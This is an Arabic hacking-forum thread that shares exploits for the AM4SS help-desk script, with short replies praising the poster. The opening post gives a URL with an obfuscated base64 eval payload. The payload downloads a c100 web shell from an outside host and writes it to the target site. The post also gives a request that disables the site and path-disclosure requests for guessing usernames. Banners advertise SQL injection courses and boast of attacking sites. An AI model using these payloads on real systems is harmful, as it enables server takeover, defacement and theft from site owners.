1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

ثغرات سكربت am4ss

الموضوع في '[ ثــغـرات الأعــضــاء]' بواسطة Abu Abdullah, بتاريخ ‏28 يوليو 2012.

كاتب الموضوع : Abu Abdullah المشاهدات : 7,362 الردود : 11 ‏28 يوليو 2012
حالة الموضوع:
مغلق
  1. غير متصل

    Abu Abdullah
    rank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    طآإلبَ
    الإقامة:

    بسم الله الرحمن الرحيم

    السلام عليكم

    فحصت سكربت
    AM4SS

    لقيت كم ثغرة ماهي خطيره وحبيت بالمره احط باقي ثغرات السكربت في الموضوع


    طبعا كان الثغرة الاولى من اكتشاف اورنج مان
    وهي بالشكل التالي



    كود:
    [COLOR=#0000BB]www[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]ddd[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]com[/COLOR][COLOR=#007700]/global.[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?[/COLOR][COLOR=#0000BB]bn[/COLOR][COLOR=#007700]=[/COLOR]

    الاستغلال هتضيف هالكود بعد =


    كود:
    eval(base64_decode(JGZpbGUgPSBmb3BlbigienoucGhwIiAsIncrIik7JHNhPWZpbGVfZ2V0X2NvbnRlbnRzKCJodHRwOi8vd3d3LnNoM2xsLm9yZy9jMTAwLnR4dCIpOyR3cml0ZSA9IGZ3cml0ZSAoJGZpbGUgLCRzYSk7)

    وبتلقى شل بهالاسم zz.php


    الثغرة الثانيه نفس النوع بس انها تعطب الموقع



    كود:
    [COLOR=#0000BB]www[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]gg[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]com[/COLOR][COLOR=#FF8000]//admincp/global.php?Checker=youStop();[/COLOR]

    واظن ان هالثغرتين من نفس المبرمج اضافها



    وثغرة اكسس بهالمكان طبعا الاستفاده منها يتطلب صفحة html



    كود:
    [COLOR=#0000BB]tickets[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?do=[/COLOR][COLOR=#0000BB]add[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]step[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]2[/COLOR]

    [​IMG]


    االحين اخطاء تتسسب باظهار مسار الموقع بيفيدني في استخراج اليوزر
    والتخمين

    تدخل ع هالمسار
    login.php
    وبعدها تضغط دخول وتشغل الاداءة مثل الصوره

    [​IMG]



    كود:
    [COLOR=#0000BB]password[/COLOR][COLOR=#007700][]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]useremail[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]sample[/COLOR][COLOR=#007700]%[/COLOR][COLOR=#0000BB]40w3afl[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]tst[/COLOR]

    وبعد
    /



    كود:
    [COLOR=#0000BB]tickets[/COLOR][COLOR=#007700].[/COLOR][COLOR=#0000BB]php[/COLOR][COLOR=#007700]?do=[/COLOR][COLOR=#0000BB]add[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]step[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]2[/COLOR]




    بنفس الطريقة الا قبلها


    كود:
    [COLOR=#0000BB]message[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]20[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]subject[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]sdfdsffggrgrt[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]3[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]useremail[/COLOR][COLOR=#007700][]=[/COLOR][COLOR=#0000BB]1[/COLOR][COLOR=#007700]&[/COLOR][COLOR=#0000BB]userfullname[/COLOR][COLOR=#007700]=[/COLOR][COLOR=#0000BB]aamaqwdsa[/COLOR]


     


    جاري تحميل الصفحة...
  2. غير متصل

    ҢącҜęЯ .:: <font color="#669999"><b>أستاذ مشارك</b></font
    rankrank
    Developer

    عضو منذ:
    ‏26 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الوظيفة:
    مكتشف ثغرات
    الإقامة:

    رد: ثغرات سكربت am4ss

    بطل وربي


    واصل دون فواصل



     


  3. غير متصل

    الحربي
    rankrank
    DeveloPer Plus

    عضو منذ:
    ‏9 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: ثغرات سكربت am4ss

    مشكور اخي واصل الى الآمام​
     


  4. غير متصل

    THE SN!PER <div class="smallfont"><span style="font-weight: b
    rank
    ExpErt DeveloPer

    عضو منذ:
    ‏2 أكتوبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: ثغرات سكربت am4ss

    بارك الله فيك عزيزي بس لومكمل جميلك واضع الأداة #:"
     


  5. غير متصل

    Numb3rs
    rank
    Developer

    عضو منذ:
    ‏20 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: ثغرات سكربت am4ss

    جــاري التجربـة .. تقبل تحياتي
     


  6. غير متصل

    Dr.MOT Support
    إدارة الموقع

    عضو منذ:
    ‏2 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    5,590
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    طالب
    الإقامة:

    رد: ثغرات سكربت am4ss

    وعليكم السلام ورحمة الله وبركاته

    بالفعل موضوعك رائع ابو عبد الله وراح انزل الملف المصاب بالثغرة مع الترقيع

    موفق
     


  7. غير متصل

    Abu Abdullah
    rank
    Developer

    عضو منذ:
    ‏28 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    طآإلبَ
    الإقامة:

    رد: ثغرات سكربت am4ss

    مشكوووورين جميعا
    واتمنى الاستفادى للجميع
    )5:"​
     


  8. غير متصل

    HASsouni
    rank
    Developer

    عضو منذ:
    ‏31 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرات سكربت am4ss

    الله يعطيك العافيه

    على جهودك

    أأخي ​
     


  9. غير متصل

    شنايدر العطوي
    rank
    Developer

    عضو منذ:
    ‏10 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرات سكربت am4ss

    يعطيك العافيه يالغآلي &:":
     


  10. غير متصل

    System³²
    rank
    Developer

    عضو منذ:
    ‏29 أكتوبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: ثغرات سكربت am4ss

    روعهة
     


الوسوم:
حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...